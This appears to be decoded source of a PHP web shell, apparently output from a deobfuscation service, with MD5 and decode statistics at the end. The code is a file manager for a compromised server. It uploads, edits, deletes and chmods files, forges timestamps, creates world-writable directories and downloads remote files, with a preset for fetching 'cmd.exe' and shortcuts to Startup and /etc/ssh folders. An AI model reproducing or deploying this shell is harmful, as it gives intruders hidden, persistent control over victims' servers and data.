echo base64_decode('PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+DQp2YXIgbiA9IDA7DQpmdW5jdGlvbiBzZWFyY2goc3RyKSB7DQoJdmFyIHR4dCwgaSwgZm91bmQ7DQoJaWYoc3RyID09ICIiKSByZXR1cm4gZmFsc2U7DQoJdHh0ID0gJCgnZmlsZWNvZGUnKS5jcmVhdGVUZXh0UmFuZ2UoKTsNCglmb3IoaSA9IDA7IGkgPD0gbiAmJiAoZm91bmQgPSB0eHQuZmluZFRleHQoc3RyKSkgIT0gZmFsc2U7IGkrKyl7DQoJCXR4dC5tb3ZlU3RhcnQoImNoYXJhY3RlciIsIDEpOw0KCQl0eHQubW92ZUVuZCgidGV4dGVkaXQiKTsNCgl9DQoJaWYoZm91bmQpeyB0eHQubW92ZVN0YXJ0KCJjaGFyYWN0ZXIiLCAtMSk7IHR4dC5maW5kVGV4dChzdHIpOyB0eHQuc2VsZWN0KCk7IHR4dC5zY3JvbGxJbnRvVmlldygpOyBuKys7IH0NCgllbHNlIHsgaWYgKG4gPiAwKSB7IG4gPSAwOyBzZWFyY2goc3RyKTsgfSBlbHNlIGFsZXJ0KHN0ciArICIuLi4gTm90LUZpbmQiKTsgfQ0KCXJldHVybiBmYWxzZTsNCn0NCjwvc2NyaXB0Pg==');
echo '<div class="msgbox"><input name="keyword" id="keyword" type="text" style="width:138px;height:15px;"><input type="button" value="IE" onclick="search($(\'keyword\').value);"> - '.$msg.'</div>';
echo '<form name="editfrm" id="editfrm" method="POST">';
subeval();
echo '<input type="hidden" name="go" value=""><input type="hidden" name="act" id="act" value="edit">';
echo '<input type="hidden" name="dir" id="dir" value="'.dirname($file).'">';
echo '<div class="actall"> <input type="text" name="filename" value="'.$file.'" style="width:528px;"> ';
if($iconv) {
	echo ' <select name="tostr">';
	$selects = array('normal' => '','utf' => 'utf-8');
	foreach($selects as $var => $name) { echo '<option value="'.$var.'"'.($name == $chst ? ' selected' : '').'>'.$name.'</option>'; }
	echo '</select>';
}
echo '</div><div class="actall"><textarea name="filecode" id="filecode" style="width:698px;height:358px;">'.htmlspecialchars($code).'</textarea></div></form>';
echo '<div class="actall" style="padding:5px;padding-right:68px;"><input type="button" onclick="$(\'editfrm\').submit();" value="" style="width:80px;"> ';
echo '<form name="backfrm" id="backfrm" method="POST"><input type="hidden" name="go" value=""><input type="hidden" name="dir" id="dir" value="'.dirname($file).'">';
subeval();
echo '<input type="button" onclick="$(\'backfrm\').submit();" value="" style="width:80px;"></form></div>';
break;

case "upfiles" : 
$updir = isset($_POST['updir']) ? $_POST['updir'] : $_POST['godir'];
$msg = ' '.get_cfg_var("upload_max_filesize").' POST '.get_cfg_var("post_max_size").'';
$max = 10;
if(isset($_FILES['uploads']) && isset($_POST['renames'])) {
	$uploads = $_FILES['uploads'];
	$msgs = array();
	for($i = 1;$i < $max;$i++) {
		if($uploads['error'][$i] == UPLOAD_ERR_OK) {
			$rename = $_POST['renames'][$i] == '' ? $uploads['name'][$i] : $_POST['renames'][$i];
			$filea = $uploads['tmp_name'][$i];
			$fileb = strdir($updir.'/'.$rename);
			$msgs[$i] = fileu($filea,$fileb) ? '<br><h2> '.$rename.'</h2>' : '<br><h1> '.$rename.'</h1>';
		}
	}
}
echo '<div class="msgbox">'.$msg.'</div>';
echo '<form name="upsfrm" id="upsfrm" method="POST" enctype="multipart/form-data">';
subeval();
echo '<input type="hidden" name="go" value="upfiles"><input type="hidden" name="act" id="act" value="upload">';
echo '<div class="actall"><p> <input type="text" name="updir" style="width:398px;" value="'.$updir.'"></p>';
for($i = 1;$i < $max;$i++) { echo '<p>'.$i.' <input type="file" name="uploads['.$i.']" style="width:300px;">  <input type="text" name="renames['.$i.']" style="width:128px;"> '.$msgs[$i].'</p>'; }
echo '</div></form><div class="actall" style="padding:8px;padding-right:68px;"><input type="button" onclick="$(\'upsfrm\').submit();" value="" style="width:80px;"> ';
echo '<form name="backfrm" id="backfrm" method="POST"><input type="hidden" name="go" value=""><input type="hidden" name="dir" id="dir" value="'.$updir.'">';
subeval();
echo '<input type="button" onclick="$(\'backfrm\').submit();" value="" style="width:80px;"></form></div>';
break;

default : 

if(isset($_FILES['upfile'])) {
	if($_FILES['upfile']['name'] == '') { $msg = '<h1></h1>'; }
	else { $rename = $_POST['rename'] == '' ? $_FILES['upfile']['name'] : $_POST['rename']; $filea = $_FILES['upfile']['tmp_name']; $fileb = strdir($nowdir.$rename); $msg = fileu($filea,$fileb) ? '<h2>'.$rename.'</h2>' : '<h1>'.$rename.'</h1>'; }
}

if(isset($_POST['act'])) {
	switch($_POST['act']) {
		case "a" : 
			if(!$_POST['files']) { $msg = '<h1> '.$_POST['var'].'</h1>'; }
			else { $i = 0; foreach($_POST['files'] as $filename) { $i += @copy(strdir($nowdir.$filename),strdir($_POST['var'].'/'.$filename)) ? 1 : 0; } $msg =  $msg = $i ? '<h2> '.$i.' '.$_POST['var'].'</h2>' : '<h1> '.$i.' '.$_POST['var'].'</h1>'; }
		break;
		case "b" : 
			if(!$_POST['files']) { $msg = '<h1></h1>'; }
			else { $i = 0; foreach($_POST['files'] as $filename) { $i += @unlink(strdir($nowdir.$filename)) ? 1 : 0; } $msg = $i ? '<h2> '.$i.' </h2>' : '<h1> '.$i.' </h1>'; }
		break;
		case "c" : 
			if(!$_POST['files']) { $msg = '<h1> '.$_POST['var'].'</h1>'; }
			elseif(!ereg("^[0-7]{4}$",$_POST['var'])) { $msg = '<h1></h1>'; }
			else { $i = 0; foreach($_POST['files'] as $filename) { $i += @chmod(strdir($nowdir.$filename),base_convert($_POST['var'],8,10)) ? 1 : 0; } $msg = $i ? '<h2> '.$i.' '.$_POST['var'].'</h2>' : '<h1> '.$i.' '.$_POST['var'].'</h1>'; }
		break;
		case "d" : 
			if(!$_POST['files']) { $msg = '<h1> '.$_POST['var'].'</h1>'; }
			elseif(!preg_match('/(\d+)-(\d+)-(\d+) (\d+):(\d+):(\d+)/',$_POST['var'])) { $msg = '<h1> '.$_POST['var'].'</h1>'; }
			else { $i = 0; foreach($_POST['files'] as $filename) { $i += @touch(strdir($nowdir.$filename),strtotime($_POST['var'])) ? 1 : 0; } $msg = $i ? '<h2> '.$i.' '.$_POST['var'].'</h2>' : '<h1> '.$i.' '.$_POST['var'].'</h1>'; }
		break;
		case "e" : 
			$path = strdir($nowdir.$_POST['var'].'/');
			if(file_exists($path)) { $msg = '<h1> '.$_POST['var'].'</h1>'; }
			else { $msg = @mkdir($path,0777) ? '<h2> '.$_POST['var'].' </h2>' : '<h1> '.$_POST['var'].' </h1>'; }
		break;
		case "f" : 
			$context = array('http' => array('timeout' => 30));
			if(function_exists('stream_context_create')) { $stream = stream_context_create($context); }
			$data = @file_get_contents ($_POST['var'],false,$stream);
			$filename = array_pop(explode('/',$_POST['var']));
			if($data) { $msg = filew(strdir($nowdir.$filename),$data,'wb') ? '<h2> '.$filename.' </h2>' : '<h1> '.$filename.' </h1>'; } else { $msg = '<h1></h1>'; }
		break;
		case "rf" : 
			$files = explode('|x|',$_POST['var']);
			if(count($files) != 2) { $msg = '<h1></h1>'; }
			else { $msg = @rename(strdir($nowdir.$files[1]),strdir($nowdir.$files[0])) ? '<h2> '.$files[1].'  '.$files[0].' </h2>' : '<h1> '.$files[1].'  '.$files[0].' </h1>'; }
		break;
		case "pd" : 
			$files = explode('|x|',$_POST['var']);
			if(count($files) != 2) { $msg = '<h1></h1>'; }
			else { $path = strdir($nowdir.$files[1]); $msg = @chmod($path,base_convert($files[0],8,10)) ? '<h2>'.$files[1].''.$files[0].'</h2>' : '<h1>'.$files[1].''.$files[0].'</h1>'; }
		break;
		case "edit" : 
			if(isset($_POST['filename']) && isset($_POST['filecode'])) { if($_POST['tostr'] == 'utf') { $_POST['filecode'] = @iconv('GB2312//IGNORE','UTF-8',$_POST['filecode']); } $msg = filew($_POST['filename'],$_POST['filecode'],'w') ? '<h2> '.$_POST['filename'].'</h2>' : '<h1> '.$_POST['filename'].'</h1>'; }
		break;
		case "deltree" : 
			$deldir = strdir($nowdir.$_POST['var'].'/');
			if(!file_exists($deldir)) { $msg = '<h1> '.$_POST['var'].' </h1>'; }
			else { $msg = deltree($deldir) ? '<h2> '.$_POST['var'].' </h2>' : '<h1> '.$_POST['var'].' </h1>'; }
		break;
	}
}

$chmod = substr(decoct(fileperms($nowdir)),-4);
if(!$chmod) { $msg .= ' - <h1></h1>'; }

$array = showdir($nowdir);
$thisurl = strdir('/'.strtr($nowdir,array(ROOTDIR => '')).'/');
$nowdir = strtr($nowdir,array('\'' => '%27','"' => '%22'));
echo '<div class="msgbox">'.$msg.'</div>';
echo '<div class="actall"><form name="frm" id="frm" method="POST">';
subeval();
echo (is_writable($nowdir) ? '<h2></h2>' : '<h1></h1>').' <input type="text" name="dir" id="dir" style="width:508px;" value="'.strdir($nowdir.'/').'"> ';
echo '<input type="button" onclick="$(\'frm\').submit();" style="width:50px;" value=""> ';
echo '<input type="button" onclick="cd(\''.ROOTDIR.'\');" style="width:68px;" value=""> ';
echo '<input type="button" onclick="cd(\''.THISDIR.'\');" style="width:68px;" value=""> ';
echo '<select onchange="cd(options[selectedIndex].value);">';
echo '<option>------</option>';
echo '<option value="C:/RECYCLER/">Win-RECYCLER</option>';
echo '<option value="C:/$Recycle.Bin/">Win-$Recycle</option>';
echo '<option value="C:/Program Files/">Win-Program</option>';
echo '<option value="C:/Documents and Settings/All Users/Start Menu/Programs/Startup/">Win-Startup</option>';
echo '<option value="C:/Documents and Settings/All Users////">Win-</option>';
echo '<option value="C:/Windows/Temp/">Win-TEMP</option>';
echo '<option value="/usr/local/">Linux-local</option>';
echo '<option value="/tmp/">Linux-tmp</option>';
echo '<option value="/var/tmp/">Linux-var</option>';
echo '<option value="/etc/ssh/">Linux-ssh</option>';
echo '</select></form></div><div class="actall">';

echo '<input type="button" value="" onclick="nf(\'edit\',\'newfile.php\');" style="width:68px;"> ';
echo '<input type="button" value="" onclick="txts(\'\',\'newdir\',\'e\');" style="width:68px;"> ';
echo '<input type="button" value="" onclick="txts(\'\',\'http://www.baidu.com/cmd.exe\',\'f\');" style="width:68px;"> ';
echo '<input type="button" value="" onclick="go(\'upfiles\',\''.$nowdir.'\');" style="width:68px;"> ';

echo '<form name="upfrm" id="upfrm" method="POST" enctype="multipart/form-data">';
subeval();
echo '<input type="hidden" name="dir" id="dir" value="'.$nowdir.'">';
echo '<input type="file" name="upfile" style="width:286px;height:21px;"> ';
echo '<input type="button" onclick="$(\'upfrm\').submit();" value="" style="width:50px;"> ';
echo ' <input type="text" name="rename" style="width:128px;">';
echo '</form></div>';

echo '<form name="frm1" id="frm1" method="POST"><table class="tables">';
subeval();
echo '<input type="hidden" name="dir" id="dir" value="'.$nowdir.'">';
echo '<input type="hidden" name="act" id="act" value="">';
echo '<input type="hidden" name="var" id="var" value="">';
echo '<th><a href="javascript:cd(\''.dirname($nowdir).'/\');"></a></th><th style="width:8%"></th><th style="width:5%"></th><th style="width:17%"></th><th style="width:17%"></th><th style="width:8%"></th>';
if($array) {
	asort($array['dir']);
	asort($array['file']);
	$dnum = $fnum = 0;
	foreach($array['dir'] as $path => $name) {
		$prem = substr(decoct(fileperms($path)),-4);
		$ctime = date('Y-m-d H:i:s',filectime($path));
		$mtime = date('Y-m-d H:i:s',filemtime($path));
		echo '<tr>';
		echo '<td><a href="javascript:cd(\''.$nowdir.$name.'\');"><b>'.strtr($name,array('%27' => '\'','%22' => '"')).'</b></a></td>';
		echo '<td><a href="javascript:dels(\''.$name.'\');"></a> ';
		echo '<a href="javascript:acts(\''.$name.'\',\'rf\',\''.$name.'\');"></a></td>';
		echo '<td><a href="javascript:acts(\''.$prem.'\',\'pd\',\''.$name.'\');">'.$prem.'</a></td>';
		echo '<td>'.$ctime.'</td>';
		echo '<td>'.$mtime.'</td>';
		echo '<td>-</td>';
		echo '</tr>';
		$dnum++;
	}
	foreach($array['file'] as $path => $name) {
		$prem = substr(decoct(fileperms($path)),-4);
		$ctime = date('Y-m-d H:i:s',filectime($path));
		$mtime = date('Y-m-d H:i:s',filemtime($path));
		$size = size(filesize($path));
		echo '<tr>';
		echo '<td><input type="checkbox" name="files[]" value="'.$name.'"><a target="_blank" href="'.$thisurl.$name.'">'.strtr($name,array('%27' => '\'','%22' => '"')).'</a></td>';
		echo '<td><a href="javascript:go(\'edit\',\''.$name.'\');"></a> ';
		echo '<a href="javascript:acts(\''.$name.'\',\'rf\',\''.$name.'\');"></a></td>';
		echo '<td><a href="javascript:acts(\''.$prem.'\',\'pd\',\''.$name.'\');">'.$prem.'</a></td>';
		echo '<td>'.$ctime.'</td>';
		echo '<td>'.$mtime.'</td>';
		echo '<td align="right"><a href="javascript:go(\'down\',\''.$name.'\');">'.$size.'</a></td>';
		echo '</tr>';
		$fnum++;
	}
}
unset($array);
echo '</table>';
echo '<div class="actall" style="text-align:left;">';
echo '<input type="checkbox" id="chkall" name="chkall" value="on" onclick="sa(this.form);"> ';
echo '<input type="button" value="" style="width:50px;" onclick=\'txts("","'.$nowdir.'","a");\'> ';
echo '<input type="button" value="" style="width:50px;" onclick=\'dels("b");\'> ';
echo '<input type="button" value="" style="width:50px;" onclick=\'txts("","0666","c");\'> ';
echo '<input type="button" value="" style="width:50px;" onclick=\'txts("","'.$mtime.'","d");\'> ';
echo '['.$dnum.'] - ['.$fnum.'] - ['.$chmod.']</div></form>';
break;
}
?>

Function Calls

None

Variables

None

Stats

MD5 c77a50053490c53c94769263bfa90d00
Eval Count 0
Decode Time 241 ms